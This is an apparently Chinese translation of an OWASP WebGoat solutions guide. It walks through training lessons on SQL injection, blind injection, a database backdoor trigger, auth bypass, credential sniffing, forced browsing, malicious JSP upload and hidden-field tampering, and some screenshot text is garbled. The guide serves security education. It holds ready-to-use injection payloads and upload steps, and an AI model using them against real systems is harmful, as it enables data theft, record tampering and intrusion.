\* You have completed String SQL Injection. \* Welcome to Parameterized Query #1

Welcome Back Neville - Staff Listing Page									
Select from the list below Larry Stooge (employee) Moe Stooge (manager) Curly Stooge (employee) Eric Walker (employee) Tom Cat (employee) Jerry Mouse (hr) David Giambi (manager) Bruce McGuirre (employee) Sean Livingston (employee) Joanne McDougal (hr) John Wayne (admin)	SearchStaff ViewProfile CreateProfile DeleteProfile Logout								

# 2.10.6.4 Stage 2: 参数化查询#1 (Stage 2: Parameterized Query #1)

### 2.10.6.4.1 总体目标(General Goals)

使用参数化查询阻止 SQL 注入。



#### 本节课程只能在 WebGoat 开发版本上完成。

### 2.10.6.4.2 操作方法(Solutions)

为了防止 SQL 注入攻击的发生,可以采用"参数化查询"。这种类型的查询可以使得 用户的每一个输入可以作为一个参数使用。本节课程类似于 Stage2,所以只简短介绍最终修 改结果。修改 org. owasp. webgoat. lessons. SQLInjection. ViewProfile. java 这 一个 class 中 getEmployeeProfile 方法,代码如下:

String query = "SELECT employee.\* "

```
+ "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
```

```
+ "ownership.employer_id = ? and ownership.employee_id = ?";
```

try

{
 Connection connection = WebSession.getConnections(s);
 PreparedStatement statement = connection.prepareStatement(query,
 ResultSet.TYPE\_SCROLL\_INSENSITIVE, ResultSet.CONCUR\_READ\_ONLY);
 statement.setString(1, userId);
 statement.setString(2, subjectUserId);
 ResultSet answer\_results = statement.executeQuery();
 //etc...

### 2.10.6.5 Stage 3: 数字型 SQL 注入(Stage 3: Numeric SQL

Injection)

### 2.10.6.5.1 总体目标(General Goals)

执行 SQL 注入绕过认证;

该课程的目的是通过注入语句,浏览到原本无法浏览的信息。通过一个普通员工的账户, 浏览其 BOSS 的账户信息。

### 2.10.6.5.2 操作方法(Solutions)

首先用 Larry,密码 larry 登录,浏览员工信息的按钮是"ViewProfile"。通过 WebScarab 抓包,我们首先将 ID 号换成其他,如 102,返回的依然是 Larry 的信息。这个地方数据库应 该是以员工 ID 作为索引,返回的是每次查询到的第一条数据。用社会工程学解释老板应该



是工资最高的,所以为了把老板排到第一个 SQL 注入排序如下:

101 or 1=1 order by salary desc

\* You have completed Numeric SQL Injection. \* Welcome to Parameterized Query #2

Goat Hills Financial Human Resources									
Welcome	Back Larry		0						
First Name:	Neville	Last Name:	Bartholomew						
Street:	1 Corporate Headquarters	City/State:	San Jose, CA						
Phone:	408-587-0024	Start Date:	3012000						
SSN:	111-111-1111	Salary:	450000						
Credit Card:	4803389267684109	Credit Card Limit:	300000						
Comments:		Manager:	112						
Disciplinary Explanation:		Disciplinary Action Dates:	112005						

2.10.6.6 Stage 4: 参数化查询#2(Stage 4: Parameterized Query

#2)

### 2.10.6.6.1 总体目标(General Goals)

使用参数化查询阻止 SQL 注入。

本节课程只能在 WebGoat 开发版本上完成。

2.10.6.6.2 操作方法(Solutions)



### 2.10.7通过 SQL 注入修改数据(Modify Data with SQL Injection)

### 2.10.7.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.7.2 技术原理(How It works)

很多数据库支持多语句操作,例如在多个语句中使用分号区分可实现按顺序执行语句。

### 2.10.7.3 总体目标(General Goals)

下面的表单允许基于用户 userid (来自 salaries 表)查看对其应用户的工资信息。该表单后台存在字符串型 SQL 注入漏洞。为了通过本节课程,需要通过 SQL 的方式修改 userid 为 jsmith 的员工的工资。

### 2.10.7.4 操作方法(Solutions)

本课程中,我们使用 UPDATE 命令来替换 SELECT 查询命令。

UPDATE 语句语法如下:

UPDATE table SET column=value WHERE column=value;

我们需要修改表 salaries,并设置 salary 字段为新的数值,使用如下命令:

UPDATE salaries SET salary=999999 WHERE userid='jsmith'

为了修改指定 userid 的工资信息,需要在 SQL 语句中限定条件,如下:

UPDATE salaries SET salary=999999 WHERE userid='jsmith'



所以,最终的攻击方式是在表单查询页面的用户 ID 出输入如下语句(注意单引号):

someuserid'; UPDATE salaries SET salary=9999999 WHERE userid='jsmith 在用户 ID 查询输入框中输入以上语句,单击按钮【Go】执行 SQL 注入攻击。完成攻 击后,重新查看 jsmith 的工资,并通过本课程。 The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith. Enter your userid: jsmith Go! USERID SALARY jsmith 9999999 Created by Chuck Willis Content and security (Security Content and security Content and security (Security Security Content and Security Security (Security Security Secur	
在用户 ID 查询输入框中输入以上语句,单击按钮【Go】执行 SQL 注入攻击。完成攻击后,重新查看 jsmith 的工资,并通过本课程。 The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith. Enter your userid: jsmith Go! USERID SALARY jsmith 99999999 Created by Chuck Willis Concentry Information Ecourty SQL Solary	someuserid'; UPDATE salaries SET salary=9999999 WHERE userid='jsmith
击后,重新查看 jsmith 的工资,并通过本课程。 The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith. Enter your userid: jsmith	在用户 ID 查询输入框中输入以上语句,单击按钮【Go】执行 SQL 注入攻击。完成巧
The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith. Enter your userid: jsmith Go! USERID SALARY jsmith 99999999 Created by Chuck Willis CONCOUNT INFORMATION SECURITY OWASP Foundation   Project WebGoat   Report Bug	击后,重新查看 jsmith 的工资,并通过本课程。
OWASP Foundation   Project WebGoat   Report Bug	The form below allows a user to view salaries associated with a userid (from the table named <b>salaries</b> ). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid <b>jsmith</b> . Enter your userid: jsmith Go!
OWASP Foundation   Project WebGoat   Report Bug	
	OWASP Foundation   Project WebGoat   Report Bug

### 2.10.8通过 SQL 注入添加数据(Add Data with SQL Injection)

### 2.10.8.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.8.2 技术原理(How It works)

很多数据库支持多语句操作,例如在多个语句中使用分号区分可实现按顺序执行语句。

### 2.10.8.3 总体目标(General Goals)

下面的表单允许基于用户 userid (来自 salaries 表) 查看对其应用户的工资信息。该表



单后台存在字符串型 SQL 注入漏洞。为了通过本节课程,需要通过 SQL 的方式向表中增加一条记录。

### 2.10.8.4 操作方法(Solutions)

在查询输入框中输入如下语句,完成 SQL 注入攻击,

whatever'; INSERT INTO salaries VALUES ('rlupin',140000);
成功完成攻击后,搜索 userid 为 rlupin 的用户,可查询到其工资信息。
The form below allows a user to view salaries associated with a userid (from the table named <b>salaries</b> ). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
USERID SALARY
rlupin 140000

### 2.10.9数据库后门(Database Backdoors)

### 2.10.9.1 技术概念或主题(Concept / Topic To Teach)

如何创建数据库后门。

### 2.10.9.2 技术原理(How It works)

数据库通常作为一个 Web 应用程序的后端来使用。此外,它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另 一个数据库操作,如 insert, select, update or delete。举个例子:攻击者可以创建一个触发器, 该触发器在创建新用户时,将每个新用户的 Email 地址设置为攻击者的地址。



### 2.10.9.3 总体目标(General Goals)

您的目标是学习如何利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库,不支持触发器,所以该课程不会真正完成。

您的 Login ID 是 101.

### 2.10.9.4 操作方法(Solutions)

输	〕入 101	,得到该	用户的信息	Ē						
Solution Videos							R	estart this Lesson		
		Us	er ID:							
s	elect us	erid, passw	ord, ssn, sal	ary, ema	il from e	emplo	yee wh	ere userid=	101	
	Submi	t								
	User ID	Password	SSN	Salary	E-	Mail				
<u> </u> -	101	jiarry	500-09-545.	1 55000	ianywsu С	reate	ed by Sh	nerif Koussa	m_acadamian	
	OWASP	Foundation	Project We	bGoat   R	Report Bu	g				
您	S可能E	已经发现,	输入的语句	句没有驯	脸证,彳	很容	易进行	- SQL 注入	。若要执行两个	语句,
中间需	寄要用を	}号分隔。	输入注入	语句 10	1; updat	te em	nployee	e set salary=	=10000.	
	Solutio	n Videos						Re	start this Lesson	
		U	ser ID:							
	<u>select u</u> employ	iserid, passv <b>yee set sal</b>	vord, ssn, sal ary=10000	ary, ema	il from e	mploy	yee whe	re userid= <mark>1</mark>	01; update	
	Subm	nit								
	User I	DPassword	SSN	Salary	E-I	Mail				
	101	larry	386-09-545	1 55000	iarry@sto Cr	reated	d by Sh	erif Koussa 🍵	acadamian	
	OWAS	P Foundatior	Project We	bGoat   R	leport Bu	g				
使	「川以口	下查询条件	=,添加触	发器:						

101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid



Solution Videos				Restart this Lesson
* Congratulation	s. You have s	success	sfully completed	this lesson.
User ID:				
select userid, pass	vord, ssn, sala	rv, ema	ail from emplovee w	here userid=101: CREATE
TRIGGER myBack employee SET er	Door BEFORI nail='john@h	E INSEF ackme	RT ON employee F com'WHERE use	OR EACH ROW BEGIN UPDATE rid = NEW.userid
Submit				
User ID Passwor	SSN	Salary	E-Mail	
101 larry	386-09-5451	55000	larry@stooges.com	
			Created by S	Sherif Koussa <mark>mu</mark> acadamian

OWASP Foundation | Project WebGoat | Report Bug

### 2.10.10 数字型盲注入(Blind Numeric SQL Injection)

### 2.10.10.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.10.2 技术原理(How It works)

某些 SQL 注入是没有明确返回信息的,只能通过条件的"真"和"假"进行判断。攻击者必须充分利用查询语句,构造子查询语句,

### 2.10.10.3 总体目标(General Goals)

下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或 假)测试检查数据库中其它条目信息。

您的目标是找到 pins 表中 cc\_number 字段值为 1111222233334444 的记录中 pin 字段的数值。pin 字段类型为 int, 整型。输入找到的数值并提交,通过本课程。



The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.

Go!

The goal is to find the value of the field **pin** in table **pins** for the row with the **cc\_number** of **1111222233334444**. The field is of type int, which is an integer.

Put the discovered pin value in the form to pass the lesson.

Enter your Account Number: 101

Account number is valid.

### 2.10.10.4 操作方法(Solutions)

本节课程中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询 到帐号的 PIN 数值。尽管如此,我们可以利用系统后台在用的查询语句。查询语句如下:

SELECT \* FROM user\_data WHERE userid=accountNumber;

如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用 AND 函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐 号有效,否则无效。例如下面两个查询方式:

101 AND 1=1

101 AND 1=2

在第一条语句中,两个条件都成立,所以页面返回帐号有效。而第二条则返回帐号无效。 现在可以针对查询语句的后半部分构造复杂语句。下面的语句可以告诉我们 PIN 数值 是否大于 10000。

101 AND ((SELECT pin FROM pins WHERE cc\_number='1111222233334444') > 10000 );

如果页面提示帐号有效,说明 PIN>10000 否则 PIN<=10000。不断调整数值,可以缩小 判断范围,并最终判断出 PIN 数值的大小。最终如下语句返回帐号有效:

101 AND ((SELECT pin FROM pins WHERE cc\_number='1111222233334444') = 2364 );

在查询框中输入 2364 并提交,通过本节课程。

### 2.10.11 字符串型盲注入(Blind String SQL Injection)

### 2.10.11.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可



以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.11.2 技术原理(How It works)

某些 SQL 注入是没有明确返回信息的,只能通过条件的"真"和"假"进行判断。攻击者必须充分利用查询语句,构造子查询语句,

### 2.10.11.3 总体目标(General Goals)

下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或 假)测试检查数据库中其它条目信息。

您的目标是找到 pins 表中 cc\_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本课程。

### 2.10.11.4 操作方法(Solutions)

本节课程非常类似与上一节。最大的不同是要查询的字段是一个字符串而不是数值。因此我们同样可以通过注入的方式查找到该字段的值。查询语句非常类似上一节,如下:

101 AND (SUBSTRING((SELECT name FROM pins WHERE cc\_number='4321432143214321'), 1, 1) < 'H' );

该语句使用了 SUBSTRING 方法, 取得 pin 字段数值的第一个字母, 并判断其是否比字母 "H"小。SUBSTRING 语法如下:

SUBSTRING(STRING,START,LENGTH)

经过多次测试(比较0-9A-Za-z等字符串)和页面的返回数据,判断出第一个字符为"J"。 同理继续判断第二个字符。

101 AND (SUBSTRING((SELECT name FROM pins WHERE cc\_number='4321432143214321'), 2, 1) < 'h' );

最终,判断出 pin 字段的值为: Jill。提交该值,通过本节课程。



### 2.11 拒绝服务(Denial of Service)

### 2.11.1多个登录引起的拒绝服务(Denial of Service from

### Multiple Logins)

### 2.11.1.1 技术概念或主题(Concept / Topic To Teach)

拒绝服务攻击是 Web 应用程序中的主要问题。如果最终用户不能开展业务或执行由 Web 应用程序所提供的服务,则是浪费时间和金钱。

### 2.11.1.2 技术原理(How It works)

数据库连接总是要占用移动资源的;过度使用会影响系统性能。

### 2.11.1.3 总体目标(General Goals)

目标网站允许用户多次登录。该网站的数据库连接池允许两个连接。您需要获得一个有 效的用户列表,并创建3个登录。

Denial of service attacks are a major issue in web applications. If the end user cannot conduct business or perform the service offered by the web application, then both time and money is wasted.

#### General Goal(s):

This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.

User Name:	
Password:	
Login	

OWASP Foundation | Project WebGoat | Report Bug

### 2.11.1.4 操作方法(Solutions)

首先使用 SQL 注入攻击,在密码输入框中输入:



or '1' = '1

注入攻击成功后,可以获得所有用户的帐号密码信息。

#### Try "dont\_care' or '1' = '1" in the password field

This site allows a user to login multiple times. This site has a database connection pool that allows 2 connections. You must obtain a list of valid users and create a total of 3 logins.

Guessable username and passwords from other lessons are excluded.

SELECT	* FROM user_	system_dat	a WHERE	user_name =	'test' and passwor	d = " OR '1'=')
userid	user_name	password	cookie			
101	jsnow	passwd1				
102	jdoe	passwd2				
103	jplane	passwd3				
104	jeff	jeff				
105	dave	dave				
Login Su	icceeded: Tota	I login coun	t: 0	1		
User Nar	me: jsnow					
Passwor	d:		_			
Login						

Sponsored by ASPECT SECURITY

分别以以下三个给用户登录: jsnow、jdoe、jeff; 通过本节课程。

### 2.12 不安全的通信(Insecure Communication)

### 2.12.1不安全的登录(Insecure Login)

### 2.12.1.1 技术概念或主题(Concept / Topic To Teach)

敏感数据不能用明文发送,通常在验证后要切换到安全连接。攻击者可通过嗅探获得的 登录信息和收集到的其他信息入侵账户。一个好的 Web 应用程序总是使用加密方式发送敏 感数据。

### 2.12.1.2 技术原理(How It works)

HTTP 数据包可以被 WireShark 等工具捕获,直接明文读取。

使用 HTTPS 访问后,所有数据被加密。服务器与应用程序通过传输层安全(Transport Layer Security (TLS))又称为安全套接字层(Secure Socket Layer (SSL))。TLS 是一种混合的加密协议,一个主密钥来建立通信。这个密钥使用的是 SHA-1 或 MD5。



### 2.12.1.3 总体目标(General Goals)

在这一课中有两个阶段,第一个阶段要尝试嗅探出文本方式发送的密码,第二个阶段是 利用同样的方法,在安全连接模式下进行尝试。

您需要为本课程进行客户端和服务端的配置,请参考入门章节 Tomcat 设置相关的材料。

### 2.12.1.4 操作方法(Solutions)

启动 WireShark,并设置捕获网卡数据。在登陆页面,单击【submit】按钮后,通过 WireShark 查看数据包,能够发现用户名和密码明文信息。



	and the state of the state state of the stat
ITTP	POST /webGoat/attack?Screen=167&menu=809 HTTP/1.1
ITTP	HTTP/1.1 200 OK[Unreassembled Packet [incorrect TO
ITTP	Continuation or non-HTTP traffic
CP	1245 > http [ACK] Seq=909 Ack=4380 win=65535 Len=0
CP	1245 > http [ACK] Seq=909 Ack=9000 Win=65295 Len=0
ITTP	Continuation or non-HTTP traffic
ITTP	Continuation or non-HTTP traffic

i), Dst: Fujitsus\_12:e2:9a (00:19:99:12:e2:9a)
Dst: 152.96.193.15 (152.96.193.15)
Dst Port: http (80), Seq: 0, Ack: 0, Len: 909

d

09Acce	pt-Langu
age: de-	chCont
ent-Type	: applic
ation/x-	www-form
-urlenco	dedUA-
CPU: X86	Accept
-Encodin	a: azip.
deflate	.User-A
aent: Mo	zilla/4.
0 (compa	tible: M
SIE 7.0:	windows
NT 5.1:	.NET CL
R 1.1.43	22: .NET
CLR 2.0	. 50727:
.NET CLR	3.0.045
06.30: I	nfoPath.
2: .NET	CLR 3.0.
04506.64	8). Host
: 152.96	.193.15.
Content	-Length:
47Con	nection:
Keen-Al	iveCac
he-Contr	ol: no-c
acheCo	okie: JS
ESSTONTD	=519D7E8
B57D137E	ED28011E
7687553A	0. Autho
rization	: Basic
73V1c306	73V1c30=
	r_user=1
ack&clea	r pass=s
niffv&su	hmit=Sub
mit	51110 2010

接下来让我们将访问连接改为 HTTPS,将浏览器地址栏中 HTTP 改为 HTTPS。然后重 复第一步的动作,您将看到密码将不再以文本方式发送。服务器和客户端的所有流量都是加 密的。



### 2.12.1.5 注意事项

请注意,WebGoat 服务器和您的浏览器客户端必须位于不同的主机,这样才能捕获网络数据包。

### 2.13 不安全的配置(Insecure Configuration)

### 2.13.1强制浏览(How to Exploit Forced Browsing)

### 2.13.1.1 技术概念或主题(Concept / Topic To Teach)

强行浏览一些本不该访问的 URL 或资源。

### 2.13.1.2 技术原理(How It works)

强制浏览是黑客用来访问获取那些没有被引用,但仍然允许被访问的资源的技术。一种 方法是操纵浏览器中的 URL,删除结尾部分,直到找到一个不受保护的目录。

### 2.13.1.3 总体目标(General Goals)

您的目标是尝试猜测"config"界面的URL。"config"的URL 只提供给维护人员。 该应用程序没有做垂直权限检查。

### 2.13.1.4 操作方法(Solutions)

如果您想访问一个受限制的页面,您需要能够猜测 URL 访问页面,如"/admin"。尝 试使用/WebGoat/config, /WebGoat/configuration, /WebGoat/conf,最后发现 conf 能够成功访问。



### 2.14 不安全的存储(Insecure Storage)

### 2.14.1强制浏览(How to Exploit Forced Browsing)

### 2.14.1.1 技术概念或主题(Concept / Topic To Teach)

在 Web 应用程序中会根据不同的应用选择不同的编码方案。

### 2.14.1.2 技术原理(How It works)

每一个编码方案都有与其相关的算法。



### 2.15 恶意执行(Malicious Execution)

### 2.15.1恶意文件执行(Malicious File Execution)

### 2.15.1.1 技术概念或主题(Concept / Topic To Teach)

很多网站允许用户上传文件,例如:图片或是视频。如果确实有效的安全措施,包含 恶意指令的文件会被上传到服务器并执行。

### 2.15.1.2 技术原理(How It works)

脚本后门属于典型的恶意文件。

### 2.15.1.3 总体目标(General Goals)

下面的表单允许您上传图片文件,图片上传后显示在当前页面。互联网上的各种论坛或 社交网站很容易找到此类应用。该功能容易被恶意文件执行漏洞利用。

为了通过本课程,您需要上传一个恶意文件。为证明您的文件能够被执行,它必须能够 创建另一个名为 guest.txt 的文件。

### 2.15.1.4 操作方法(Solutions)

第一步是在服务器上创建一个可以运行的文件,该文件运行后会出创建 guest.txt。为完成该步骤,我们使用了 Java 中 createNewFile()命令。创建一个.jsp 后缀的文件 hacker.jsp,其代码如下:

<HTML> <% java.io.File file = new java.io.File("filepath\\guest.txt"); file.createNewFile(); %> </HTML>

<%内为 JSP 代码。该段代码功能是创建一个 guest.ext 文件。其中 filepath 需要您自己 填写成一个指定的路径,注意 Windows 下文件分隔符中\字符需要通过\\转义。Linux 系统下 分隔符为 "/"。

当前测试环境中位置为: /var/lib/tomcat6/webapps/WebGoat/mfe\_target/guest.txt 。 接下来上传恶意 jsp 文件,并找出该文件的位置,从而访问并执行该文件。 通过图片上传按钮,提交并上传"图片文件"hacker.jsp。



ι

http://www.owasp.org.cn

INTELLIGENT INFORMATION SECURITY

◄ Hints ► Show Params	Show Cookies	Lesson Plan	Show Java	Solution
Solution Videos			Re	start this Lesson
The form below allows you to u this are often found on web bas vulnerable to Malicious File Exe	pload an image wh sed discussion boar cution.	ich will be display ds and social netw	ed on this pag vorking sites. 1	e. Features like This feature is
In order to pass this lesson, up execute, it should create anoth	load and run a mal er file named:	icious file. In orde	r to prove that	t your file can
/var/lib/tomcat6/webapps/Web	Goat/mfe_target/g	uest.txt		
Once you have created this file	, you will pass the l	esson.		
WebGoat Image Storag	e			
Your current image:				
No image uploaded				
Upload a new image: D:\hacke	r.jsp	浏览 Sta	rt Upload	

由于这不是个合法的图片文件,因此上传成功后我们看到的是一个错误图标。

WebGoat Im <del>age Stor</del> age	
Your current image:	浏览… Start Upload
	Created by Chuck Willis

OWASP Foundation | Project WebGoat | Report Bug

### 鼠标右键,查看该"图片"的地址。

In (my	属性	22
✓ Hints ► Show Params Show C	常规	hacker. jsp
Solution Videos		
this are often found on web based discuss vulnerable to Malicious File Execution.	协议:	HyperText Transfer Protocol
In order to pass this lesson, upload and ri execute, it should create another file nam /var/lib/tomcat6/webapps/WebGoat/mfe	类型: 地址:	不可用 http://webgoatvm/WebGoat/uploads/hacker.jsp
Once you have created this file, you will p	(UKL) 大小:	不可用
WebGoat Image Storage	维度:	28 x 30 pixels
Your current image:	创建时间:	不可用
Upload a new image:	修改时间:	不可用
Cre		<b>确定 取消</b> 应用 (A)

OWASP Foundation | Project WebGoat | Report Bug



访问该 URL: <u>http://webgoatvm/WebGoat/uploads/hacker.jsp</u>,执行恶意文件。

🅘 ht	tp://	/webgo	atvm/We	bGoat/up	loads/ha	cker.jsp	- Mozilla	Firefox			-	and the state
文件(	E)	编辑(E)	查看(⊻)	历史( <u>S</u> )	书签(B)	工具( <u>T</u> )	帮助( <u>H</u> )	-				
$\Box$	9	Malicio	us File Ex	ecution		× 🖸	http://we	bgoatvm/	Weł	bGoat/uplo >	< +	
(	) 🕢	webgo	atvm/We	bGoat/up	loads/ha	cker.jsp						
P 7	问量	跢 🔒	火狐官方如	点 🗍 新	<b>斥手上路</b>	🚽 常用网	刚址					

访问该 URL 会看到一个空白页面,刷新课程页面,本课程通过(guest.txt 文件已经被 创建)。

### 2.16 参数篡改(Parameter Tampering)

### 2.16.1绕过 HTML 字段限制(Bypass HTML Field Restrictions)

### 2.16.1.1 技术概念或主题(Concept / Topic To Teach)

客户端验证不应该被认为是一种安全的参数验证方法。这种验证方式只能帮那些不知道 所需输入的用户缩短服务器处理时间。攻击者可以用各种方法轻易的绕过这种机制。任何客 户端验证都应该复制到服务器端。这将大大减少不安全的参数在应用程序中使用的可能性。 在这个练习中,每个输入框中有不同的输入要求,您要做的就是绕过客户端验证机制破坏这 些规则,输入不允许输入的字符。

### 2.16.1.2 技术原理(How It works)

很多浏览器辅助工具都支持修改 HTML 或 JavaScript 代码, 也支持手动提交 HTTP 数据。

### 2.16.1.3 总体目标(General Goals)

向网站发送超出预期的输入信息。在该练习中,您的任务是破坏客户端校验并向网站发送非法输入信息,包括部分被禁用的字段。



6个字段必须同时验证。

### 2.16.1.4 操作方法(Solutions)

要通过本节课程,您需要在6个字段中提交非法字符(斜杠、单引号等)。其中有三个 字段涉及到切换或下来,我们将通过 Webscarab 中断并修改请求。

我们还需要向禁用的字段写入非法数据。这里有两种方式可以实现:通过 Firebug 插件 启用或通过 Webscarab 修改。

打开 Firebug, 找到 form 表单包含的几个字段,如: disabledinput。删除属性 disabled。此时页面上的禁用按钮已经实效, 控件被激活处于可用状态。该操作所产生的非法输入也会在 Webscarab 中体现。

g (XSS) adling	Select field with two possible values:	
dung	foo M	
cation	Radio button with two possible values:	
tion	⊙ foo	
	Obar	
ng	Checkhov	
strictions	V checkbox	
<u>lia</u>	Input field restricted to 5 characters:	
vaScript	12345	
at Flaure	Disabled input field:	
nt Flaws	disabled	
	Submit button:	
	Submit	
	Created by Chuck ANDIANT	
	OWASP Foundation   Project WebGoat   Report Bug	
	OWASP Foundation   Project WebGoat   Report Bug	
. Consola	OWASP Foundation   Project WebGoat   Report Bug	
Console	OWASP Foundation   Project WebGoat   Report Bug	
Console     n < div#lessonCo	Created by Chuck C	
Console	Created by Chuck Concern and Chuck Willis Concern and	
Console     div#lessonCi <ing <="" <ing="" li=""> </ing>	Created by Chuck Concern and Created by Chuck Concern and Concern	
Console n < div#lessonC <inp chec<="" checl="" td=""><td>OWASP Foundation   Project WebGoat   Report Bug         HTML        CSS Script DOM Net         Content &lt; div#lessonArea &lt; div#twoCol &lt; div#wrap &lt; body.page &lt; html</td>         v = ust=ustance. v/ dav         put type="checkbox" name="checkbox" checked=""&gt;         :kbox</inp>	OWASP Foundation   Project WebGoat   Report Bug         HTML        CSS Script DOM Net         Content < div#lessonArea < div#twoCol < div#wrap < body.page < html	
Console n < div#lessonCo		
Console	Created by Chuck Diversion Content of the content o	
Console     C	Created by Chuck Discontine Control of the Control	
Console     C	Created by Chuck Diversion Control of the content o	
Console     C	Created by Chuck Diversion Control of the content o	
Console     in < div#lessonCi <inp <inp="" chec<="" check="" td=""><td>Created by Chuck Discourse Control of the content o</td><td></td></inp>	Created by Chuck Discourse Control of the content o	
Console     (ing     checl	Created by Chuck Difference of the constraints of the constraint o	
Console  n < div#lessonCo	Created by Chuck Diversion Content of the content o	
Console  n < div#lessonC		

另一种选择是是使用 WebScarab 拦截请求,然后手工添加非法字符 disabledinput。 当您完成输入添加后,记下来是提交验证输入。为每个字段设置不允许的非法字符,确 保至少有 5 个字段的长度超过了系统原先设定的限制。



D cur nequest				_ 0
	Intercept requests : [	Intercept respons	es: 🔲	
Parsed Raw				
Method URL				Version
POST http://localhost.:808	0/webgoat/attack?Scree	en=12&menu=1700		HTTP/1.0
Header Value				1
Header Value				
Iser-Agent Mozilla/5.0				
Accept text/html ap			=	Insert
Accept-Lan en-us.en.g				Delete
Accept-Enc gzip, deflate				Delete
Accept-Cha ISO-8859-1			_	
Proxy-Conn keep-alive			-	
URLENCODED TEXT H	ex			
Variable	3	Val	ue	
select	&"	<>,?sd/.fsmdf.//		
radio	&	<>,?sd/.fsmdf.//		
checkbox	87	<>,?sd/.fsmdf.//		
disabledinput	8	<>,7sd/.tsmdt.//		Insert
Shortinput	& 	<>,7sd/.tsmdt.//		
SUBMIT	a.	<>,7Sd/.1Smdf.//		Delete

完成修改后,提交数据,通过本课程。

### 2.16.2利用隐藏字段(Exploit Hidden Fields)

### 2.16.2.1 技术概念或主题(Concept / Topic To Teach)

开发人员在加载信息的页面上使用隐藏字段来跟踪、登录、定价等。虽然这是一种方便 且易于开发的机制,他们往往不验证从隐藏字段收到的信息。本课程中,我们将了解如何找 到和修改隐藏字段以便宜的价格购买产品。

### 2.16.2.2 技术原理(How It works)

不同的 HTTP 参数会触发后端不同的业务逻辑。



### 2.16.2.3 总体目标(General Goals)

您需要利用隐藏字段,使用错误的价格购买产品。

Solution Videos

Restart this Lesson

SECURIT

Hint: This application is using hidden fields to transmit price information to the server.

Try to purchase the HDTV for less than the purchase price, if you have not done so already.

Shopping Cart

Shopping Cart Items To Buy Now			Quantity	Total
56 inch HDTV (model KTV-551)		2999.99	1	\$2999.99
The total charged to your credit card:	\$2999.99	Update	Cart Pu	rchase

ASPEC

### 2.16.2.4 操作方法(Solutions)

开启 WebScarab、Firebug 后直接查看源代码,您将能看到代码里多了一个隐藏字段— 一交易额。

```
else document.form.submit();

{

</SCRIPT>

</center><hl>Shopping Cart </hl></center><br>
width='90%' border='1' cellpadding='2'>Shopping Cart Items -- To

